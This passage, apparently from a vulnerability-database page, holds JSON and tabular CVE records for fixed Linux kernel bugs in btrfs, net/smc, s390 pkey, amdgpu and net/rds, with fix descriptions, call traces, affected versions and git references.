0000000000350ee0\n Call Trace:\n \u003cTASK\u003e\n insert_inline_extent_backref+0x46/0xd0\n __btrfs_inc_extent_ref.isra.0+0x5f/0x200\n ? btrfs_merge_delayed_refs+0x164/0x190\n __btrfs_run_delayed_refs+0x561/0xfa0\n ? btrfs_search_slot+0x7b4/0xb30\n ? btrfs_update_root+0x1a9/0x2c0\n btrfs_run_delayed_refs+0x73/0x1f0\n ? btrfs_update_root+0x1a9/0x2c0\n btrfs_commit_transaction+0x50/0xa50\n ? btrfs_update_reloc_root+0x122/0x220\n prepare_to_merge+0x29f/0x320\n relocate_block_group+0x2b8/0x550\n btrfs_relocate_block_group+0x1a6/0x350\n btrfs_relocate_chunk+0x27/0xe0\n btrfs_balance+0x777/0xe60\n balance_kthread+0x35/0x50\n ? btrfs_balance+0xe60/0xe60\n kthread+0x16b/0x190\n ? set_kthread_struct+0x40/0x40\n ret_from_fork+0x22/0x30\n \u003c/TASK\u003e\n\nNormally snapshot deletion and relocation are excluded from running at\nthe same time by the fs_info-\u003ecleaner_mutex. However if we had a\npending balance waiting to get the -\u003ecleaner_mutex, and a snapshot\ndeletion was running, and then the box crashed, we would come up in a\nstate where we have a half deleted snapshot.\n\nAgain, in the normal case the snapshot deletion needs to complete before\nrelocation can start, but in this case relocation could very well start\nbefore the snapshot deletion completes, as we simply add the root to the\ndead roots list and wait for the next time the cleaner runs to clean up\nthe snapshot.\n\nFix this by setting a bit on the fs_info if we have any DEAD_ROOT\u0027s that\nhad a pending drop_progress key. If they do then we know we were in the\nmiddle of the drop operation and set a flag on the fs_info. Then\nbalance can wait until this flag is cleared to start up again.\n\nIf there are DEAD_ROOT\u0027s that don\u0027t have a drop_progress set then we\u0027re\nsafe to start balance right away as we\u0027ll be properly protected by the\ncleaner_mutex."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:45.746Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6599d5e8bd758d897fd2ef4dc388ae50278b1f7e"
},
{
"url": "https://git.kernel.org/stable/c/5e70bc827b563caf22e1203428cc3719643de5aa"
},
{
"url": "https://git.kernel.org/stable/c/b4be6aefa73c9a6899ef3ba9c5faaa8a66e333ef"
}
],
"title": "btrfs: do not start relocation until in progress drops are done",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48901",
"datePublished": "2024-08-22T01:30:15.942Z",
"dateReserved": "2024-08-21T06:06:23.291Z",
"dateUpdated": "2025-05-04T08:25:45.746Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48909 (GCVE-0-2022-48909)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/smc: fix connection leak
There's a potential leak issue under following execution sequence :
smc_release smc_connect_work
if (sk->sk_state == SMC_INIT)
send_clc_confirim
tcp_abort();
...
sk.sk_state = SMC_ACTIVE
smc_close_active
switch(sk->sk_state) {
...
case SMC_ACTIVE:
smc_close_final()
// then wait peer closed
Unfortunately, tcp_abort() may discard CLC CONFIRM messages that are
still in the tcp send buffer, in which case our connection token cannot
be delivered to the server side, which means that we cannot get a
passive close message at all. Therefore, it is impossible for the to be
disconnected at all.
This patch tries a very simple way to avoid this issue, once the state
has changed to SMC_ACTIVE after tcp_abort(), we can actively abort the
smc connection, considering that the state is SMC_INIT before
tcp_abort(), abandoning the complete disconnection process should not
cause too much problem.
In fact, this problem may exist as long as the CLC CONFIRM message is
not received by the server. Whether a timer should be added after
smc_close_final() needs to be discussed in the future. But even so, this
patch provides a faster release for connection in above case, it should
also be valuable.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48909",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:07.353240Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:11.908Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/smc/af_smc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2e8d465b83db307f04ad265848f8ab3f78f6918f",
"status": "affected",
"version": "39f41f367b08650e9aa314e3a13fb6dda1e9eec7",
"versionType": "git"
},
{
"lessThan": "80895b6f9154fb22d36fab311ccbb75503a2c87b",
"status": "affected",
"version": "39f41f367b08650e9aa314e3a13fb6dda1e9eec7",
"versionType": "git"
},
{
"lessThan": "e98d46ccfa84b35a9e4b1ccdd83961b41a5d7ce5",
"status": "affected",
"version": "39f41f367b08650e9aa314e3a13fb6dda1e9eec7",
"versionType": "git"
},
{
"lessThan": "9f1c50cf39167ff71dc5953a3234f3f6eeb8fcb5",
"status": "affected",
"version": "39f41f367b08650e9aa314e3a13fb6dda1e9eec7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/smc/af_smc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.104",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: fix connection leak\n\nThere\u0027s a potential leak issue under following execution sequence :\n\nsmc_release \t\t\t\tsmc_connect_work\nif (sk-\u003esk_state == SMC_INIT)\n\t\t\t\t\tsend_clc_confirim\n\ttcp_abort();\n\t\t\t\t\t...\n\t\t\t\t\tsk.sk_state = SMC_ACTIVE\nsmc_close_active\nswitch(sk-\u003esk_state) {\n...\ncase SMC_ACTIVE:\n\tsmc_close_final()\n\t// then wait peer closed\n\nUnfortunately, tcp_abort() may discard CLC CONFIRM messages that are\nstill in the tcp send buffer, in which case our connection token cannot\nbe delivered to the server side, which means that we cannot get a\npassive close message at all. Therefore, it is impossible for the to be\ndisconnected at all.\n\nThis patch tries a very simple way to avoid this issue, once the state\nhas changed to SMC_ACTIVE after tcp_abort(), we can actively abort the\nsmc connection, considering that the state is SMC_INIT before\ntcp_abort(), abandoning the complete disconnection process should not\ncause too much problem.\n\nIn fact, this problem may exist as long as the CLC CONFIRM message is\nnot received by the server. Whether a timer should be added after\nsmc_close_final() needs to be discussed in the future. But even so, this\npatch provides a faster release for connection in above case, it should\nalso be valuable."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:54.512Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2e8d465b83db307f04ad265848f8ab3f78f6918f"
},
{
"url": "https://git.kernel.org/stable/c/80895b6f9154fb22d36fab311ccbb75503a2c87b"
},
{
"url": "https://git.kernel.org/stable/c/e98d46ccfa84b35a9e4b1ccdd83961b41a5d7ce5"
},
{
"url": "https://git.kernel.org/stable/c/9f1c50cf39167ff71dc5953a3234f3f6eeb8fcb5"
}
],
"title": "net/smc: fix connection leak",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48909",
"datePublished": "2024-08-22T01:30:51.686Z",
"dateReserved": "2024-08-21T06:06:23.293Z",
"dateUpdated": "2025-05-04T08:25:54.512Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42157 (GCVE-0-2024-42157)
Vulnerability from cvelistv5
Published
2024-07-30 07:46
Modified
2025-05-04 09:24
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
s390/pkey: Wipe sensitive data on failure
Wipe sensitive data from stack also if the copy_to_user() fails.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 Version: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:31.911Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e2e374403bf73140d0efc9541cb1b3bea55ac02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b5eb9176ebd4697bc248bf8d145e66d782cf5250"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93c034c4314bc4c4450a3869cd5da298502346ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4889f117755b2f18c23045a0f57977f3ec130581"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c51795885c801b6b7e976717e0d6d45b1e5be0f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90a01aefb84b09ccb6024d75d85bb8f620bd3487"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c44a2151e5d21c66b070a056c26471f30719b575"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1d8c270de5eb74245d72325d285894a577a945d9"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42157",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:15:05.289606Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:34.008Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6e2e374403bf73140d0efc9541cb1b3bea55ac02",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "b5eb9176ebd4697bc248bf8d145e66d782cf5250",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "93c034c4314bc4c4450a3869cd5da298502346ad",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "4889f117755b2f18c23045a0f57977f3ec130581",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "c51795885c801b6b7e976717e0d6d45b1e5be0f0",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "90a01aefb84b09ccb6024d75d85bb8f620bd3487",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "c44a2151e5d21c66b070a056c26471f30719b575",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "1d8c270de5eb74245d72325d285894a577a945d9",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.98",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.98",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Wipe sensitive data on failure\n\nWipe sensitive data from stack also if the copy_to_user() fails."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:21.751Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6e2e374403bf73140d0efc9541cb1b3bea55ac02"
},
{
"url": "https://git.kernel.org/stable/c/b5eb9176ebd4697bc248bf8d145e66d782cf5250"
},
{
"url": "https://git.kernel.org/stable/c/93c034c4314bc4c4450a3869cd5da298502346ad"
},
{
"url": "https://git.kernel.org/stable/c/4889f117755b2f18c23045a0f57977f3ec130581"
},
{
"url": "https://git.kernel.org/stable/c/c51795885c801b6b7e976717e0d6d45b1e5be0f0"
},
{
"url": "https://git.kernel.org/stable/c/90a01aefb84b09ccb6024d75d85bb8f620bd3487"
},
{
"url": "https://git.kernel.org/stable/c/c44a2151e5d21c66b070a056c26471f30719b575"
},
{
"url": "https://git.kernel.org/stable/c/1d8c270de5eb74245d72325d285894a577a945d9"
}
],
"title": "s390/pkey: Wipe sensitive data on failure",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42157",
"datePublished": "2024-07-30T07:46:59.362Z",
"dateReserved": "2024-07-29T15:50:41.194Z",
"dateUpdated": "2025-05-04T09:24:21.751Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52912 (GCVE-0-2023-52912)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-21 08:50
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Fixed bug on error when unloading amdgpu
Fixed bug on error when unloading amdgpu.
The error message is as follows:
[ 377.706202] kernel BUG at drivers/gpu/drm/drm_buddy.c:278!
[ 377.706215] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
[ 377.706222] CPU: 4 PID: 8610 Comm: modprobe Tainted: G IOE 6.0.0-thomas #1
[ 377.706231] Hardware name: ASUS System Product Name/PRIME Z390-A, BIOS 2004 11/02/2021
[ 377.706238] RIP: 0010:drm_buddy_free_block+0x26/0x30 [drm_buddy]
[ 377.706264] Code: 00 00 00 90 0f 1f 44 00 00 48 8b 0e 89 c8 25 00 0c 00 00 3d 00 04 00 00 75 10 48 8b 47 18 48 d3 e0 48 01 47 28 e9 fa fe ff ff <0f> 0b 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 41 54 55 48 89 f5 53
[ 377.706282] RSP: 0018:ffffad2dc4683cb8 EFLAGS: 00010287
[ 377.706289] RAX: 0000000000000000 RBX: ffff8b1743bd5138 RCX: 0000000000000000
[ 377.706297] RDX: ffff8b1743bd5160 RSI: ffff8b1743bd5c78 RDI: ffff8b16d1b25f70
[ 377.706304] RBP: ffff8b1743bd59e0 R08: 0000000000000001 R09: 0000000000000001
[ 377.706311] R10: ffff8b16c8572400 R11: ffffad2dc4683cf0 R12: ffff8b16d1b25f70
[ 377.706318] R13: ffff8b16d1b25fd0 R14: ffff8b1743bd59c0 R15: ffff8b16d1b25f70
[ 377.706325] FS: 00007fec56c72c40(0000) GS:ffff8b1836500000(0000) knlGS:0000000000000000
[ 377.706334] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 377.706340] CR2: 00007f9b88c1ba50 CR3: 0000000110450004 CR4: 00000000003706e0
[ 377.706347] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 377.706354] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 377.706361] Call Trace:
[ 377.706365] <TASK>
[ 377.706369] drm_buddy_free_list+0x2a/0x60 [drm_buddy]
[ 377.706376] amdgpu_vram_mgr_fini+0xea/0x180 [amdgpu]
[ 377.706572] amdgpu_ttm_fini+0x12e/0x1a0 [amdgpu]
[ 377.706650] amdgpu_bo_fini+0x22/0x90 [amdgpu]
[ 377.706727] gmc_v11_0_sw_fini+0x26/0x30 [amdgpu]
[ 377.706821] amdgpu_device_fini_sw+0xa1/0x3c0 [amdgpu]
[ 377.706897] amdgpu_driver_release_kms+0x12/0x30 [amdgpu]
[ 377.706975] drm_dev_release+0x20/0x40 [drm]
[ 377.707006] release_nodes+0x35/0xb0
[ 377.707014] devres_release_all+0x8b/0xc0
[ 377.707020] device_unbind_cleanup+0xe/0x70
[ 377.707027] device_release_driver_internal+0xee/0x160
[ 377.707033] driver_detach+0x44/0x90
[ 377.707039] bus_remove_driver+0x55/0xe0
[ 377.707045] pci_unregister_driver+0x3b/0x90
[ 377.707052] amdgpu_exit+0x11/0x6c [amdgpu]
[ 377.707194] __x64_sys_delete_module+0x142/0x2b0
[ 377.707201] ? fpregs_assert_state_consistent+0x22/0x50
[ 377.707208] ? exit_to_user_mode_prepare+0x3e/0x190
[ 377.707215] do_syscall_64+0x38/0x90
[ 377.707221] entry_SYSCALL_64_after_hwframe+0x63/0xcd
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52912",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:45.870527Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:03.232Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9196eb7c52e55749a332974f0081f77d53d60199",
"status": "affected",
"version": "c9cad937c0c58618fe5b0310fd539a854dc1ae95",
"versionType": "git"
},
{
"lessThan": "99f1a36c90a7524972be5a028424c57fa17753ee",
"status": "affected",
"version": "c9cad937c0c58618fe5b0310fd539a854dc1ae95",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vram_mgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.19"
},
{
"lessThan": "5.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fixed bug on error when unloading amdgpu\n\nFixed bug on error when unloading amdgpu.\n\nThe error message is as follows:\n[ 377.706202] kernel BUG at drivers/gpu/drm/drm_buddy.c:278!\n[ 377.706215] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI\n[ 377.706222] CPU: 4 PID: 8610 Comm: modprobe Tainted: G IOE 6.0.0-thomas #1\n[ 377.706231] Hardware name: ASUS System Product Name/PRIME Z390-A, BIOS 2004 11/02/2021\n[ 377.706238] RIP: 0010:drm_buddy_free_block+0x26/0x30 [drm_buddy]\n[ 377.706264] Code: 00 00 00 90 0f 1f 44 00 00 48 8b 0e 89 c8 25 00 0c 00 00 3d 00 04 00 00 75 10 48 8b 47 18 48 d3 e0 48 01 47 28 e9 fa fe ff ff \u003c0f\u003e 0b 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 41 54 55 48 89 f5 53\n[ 377.706282] RSP: 0018:ffffad2dc4683cb8 EFLAGS: 00010287\n[ 377.706289] RAX: 0000000000000000 RBX: ffff8b1743bd5138 RCX: 0000000000000000\n[ 377.706297] RDX: ffff8b1743bd5160 RSI: ffff8b1743bd5c78 RDI: ffff8b16d1b25f70\n[ 377.706304] RBP: ffff8b1743bd59e0 R08: 0000000000000001 R09: 0000000000000001\n[ 377.706311] R10: ffff8b16c8572400 R11: ffffad2dc4683cf0 R12: ffff8b16d1b25f70\n[ 377.706318] R13: ffff8b16d1b25fd0 R14: ffff8b1743bd59c0 R15: ffff8b16d1b25f70\n[ 377.706325] FS: 00007fec56c72c40(0000) GS:ffff8b1836500000(0000) knlGS:0000000000000000\n[ 377.706334] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 377.706340] CR2: 00007f9b88c1ba50 CR3: 0000000110450004 CR4: 00000000003706e0\n[ 377.706347] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 377.706354] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 377.706361] Call Trace:\n[ 377.706365] \u003cTASK\u003e\n[ 377.706369] drm_buddy_free_list+0x2a/0x60 [drm_buddy]\n[ 377.706376] amdgpu_vram_mgr_fini+0xea/0x180 [amdgpu]\n[ 377.706572] amdgpu_ttm_fini+0x12e/0x1a0 [amdgpu]\n[ 377.706650] amdgpu_bo_fini+0x22/0x90 [amdgpu]\n[ 377.706727] gmc_v11_0_sw_fini+0x26/0x30 [amdgpu]\n[ 377.706821] amdgpu_device_fini_sw+0xa1/0x3c0 [amdgpu]\n[ 377.706897] amdgpu_driver_release_kms+0x12/0x30 [amdgpu]\n[ 377.706975] drm_dev_release+0x20/0x40 [drm]\n[ 377.707006] release_nodes+0x35/0xb0\n[ 377.707014] devres_release_all+0x8b/0xc0\n[ 377.707020] device_unbind_cleanup+0xe/0x70\n[ 377.707027] device_release_driver_internal+0xee/0x160\n[ 377.707033] driver_detach+0x44/0x90\n[ 377.707039] bus_remove_driver+0x55/0xe0\n[ 377.707045] pci_unregister_driver+0x3b/0x90\n[ 377.707052] amdgpu_exit+0x11/0x6c [amdgpu]\n[ 377.707194] __x64_sys_delete_module+0x142/0x2b0\n[ 377.707201] ? fpregs_assert_state_consistent+0x22/0x50\n[ 377.707208] ? exit_to_user_mode_prepare+0x3e/0x190\n[ 377.707215] do_syscall_64+0x38/0x90\n[ 377.707221] entry_SYSCALL_64_after_hwframe+0x63/0xcd"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:50:02.701Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9196eb7c52e55749a332974f0081f77d53d60199"
},
{
"url": "https://git.kernel.org/stable/c/99f1a36c90a7524972be5a028424c57fa17753ee"
}
],
"title": "drm/amdgpu: Fixed bug on error when unloading amdgpu",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52912",
"datePublished": "2024-08-21T06:10:53.481Z",
"dateReserved": "2024-08-21T06:07:11.016Z",
"dateUpdated": "2025-05-21T08:50:02.701Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27024 (GCVE-0-2024-27024)
Vulnerability from cvelistv5
Published
2024-05-01 12:49
Modified
2025-05-04 12:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/rds: fix WARNING in rds_conn_connect_if_down
If connection isn't established yet, get_mr() will fail, trigger connection after
get_mr().
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
